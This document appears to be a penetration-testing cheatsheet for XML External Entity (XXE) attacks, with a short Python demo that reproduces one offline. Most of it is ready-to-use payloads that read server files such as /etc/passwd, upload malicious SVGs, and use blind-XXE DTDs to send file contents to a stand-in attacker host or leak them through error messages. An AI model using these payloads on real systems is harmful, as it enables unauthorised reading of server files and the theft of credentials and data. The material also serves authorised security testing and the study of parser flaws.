XXE Attacks

PRACTICE ! PRACTICE ! PRACTICE !

Whenever you find a request that handles any kind of XML document, don't hesitate to inject :

<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>

Don't forget to replace the value of an element that is echoed back in the response with &xxe; (the file content shows up in the response where that element's value used to be)
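The in-band XXE above, reproduced offline as an added example (this is not code from the original page): Python's xml.sax parser is run once with external general entities enabled, which is how a misconfigured parser behaves, and once with the library default (external entities ignored since Python 3.7.1). The stockCheck/productId element names and the temp file standing in for /etc/passwd are assumptions made for the demo; the file content is constructed.

```python
"""Classic in-band XXE: same payload as the cheatsheet, vulnerable parser
configuration beside the safe default. Added example, not the page's own code."""
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data the parser delivers inside one element."""

    def __init__(self, wanted):
        super().__init__()
        self.wanted = wanted
        self.in_wanted = False
        self.chunks = []

    def startElement(self, name, attrs):
        self.in_wanted = (name == self.wanted)

    def endElement(self, name):
        if name == self.wanted:
            self.in_wanted = False

    def characters(self, content):
        if self.in_wanted:
            self.chunks.append(content)


def parse_product_id(xml_bytes, resolve_external_entities):
    """Parse a stock-check document and return the text found in <productId>.

    resolve_external_entities=True mirrors a misconfigured parser (the
    vulnerable case); False is the xml.sax default since Python 3.7.1."""
    collector = TextCollector("productId")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


def build_xxe_payload(file_url):
    """The cheatsheet's first payload, with &xxe; placed in the element that
    the application echoes back (productId here; an assumed element name)."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "{file_url}"> ]>'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    ).encode()


def demo():
    """Return (leaked_text, safe_text) from the vulnerable and default parsers."""
    # Constructed stand-in for /etc/passwd so the demo never touches real files.
    secret = "root:x:0:0:root:/root:/bin/bash"
    with tempfile.TemporaryDirectory() as tmp:
        target = pathlib.Path(tmp) / "passwd"
        target.write_text(secret)
        payload = build_xxe_payload(target.as_uri())  # file:///... URL, as in the payload
        leaked = parse_product_id(payload, resolve_external_entities=True)
        safe = parse_product_id(payload, resolve_external_entities=False)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("default parser returned:   ", repr(safe))
```

The only difference between the two runs is the feature_external_ges flag: with it on, the file content is delivered as ordinary character data of the element, which is exactly what gets reflected back to you in a real response; with it off the entity reference is silently skipped. When reviewing a target's parser, that flag (or its equivalent, such as resolve_entities in lxml) is the setting to look for.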

PHP Wrappers :

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>

Replace the echoed element's value with &xxe; as before; the response carries the file base64-encoded, so decode it. This works on PHP targets only, and is the way to read files whose raw content (XML, PHP source, binary) would otherwise break the document and produce a parse error instead of output

Try to get an out-of-band network connection (useful when nothing is reflected in the response) :

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR"> ]>

If you can't define a DOCTYPE or entities (for example, your input is only a fragment the server embeds into its own XML document), try XInclude instead :

<d0p xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></d0p>

XXE via File Upload :

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Name the file with a .svg extension and set the Content-Type to image/svg+xml or text/xml; if the server parses the SVG (for example, to generate a thumbnail), the rendered image contains the entity's value

Blind XXE

Blind XXE to detect out-of-band network interaction

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER'S IP"> %xxe; ]>

Exploiting Blind XXE

To perform this, we need an exploit server hosting our malicious DTD :

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLAB/?x=%file;'>">
%eval;
%exfil;

Now point the usual payload at the exploit server's URL and watch for the out-of-band request: the file content arrives in its query string. Use a single-line file such as /etc/hostname rather than /etc/passwd here, because newlines in the file content make the URL invalid and the request is never sent; multi-line files need the error-based technique below.

<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "https://THE-MALICIOUS-DTD-URL/exploit.dtd"> %xxe; ]>

Blind XXE to retrieve data by triggering errors

Store this DTD on the exploit server :

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Then load it the usual way; the parser fails to open the non-existent path and the error message returned by the server contains the contents of /etc/passwd :

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://YOUR-EXPLOIT-DTD"> %xxe;]>

Blind XXE by repurposing a local DTD

Use this payload when out-of-band connections are blocked and the target is a Linux system: it loads a DTD that already exists on the target (this one ships with GNOME's yelp package) and redefines the ISOamso entity declared in it, so the same error-based leak happens without any external DTD. It only works if that file actually exists on the target, so try other known DTD paths if it doesn't

<!DOCTYPE stockCheck [ 
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> 
<!ENTITY % ISOamso ' 
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> 

<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> 

&#x25;eval; 
&#x25;error; 
'> 
%local_dtd; 
]>
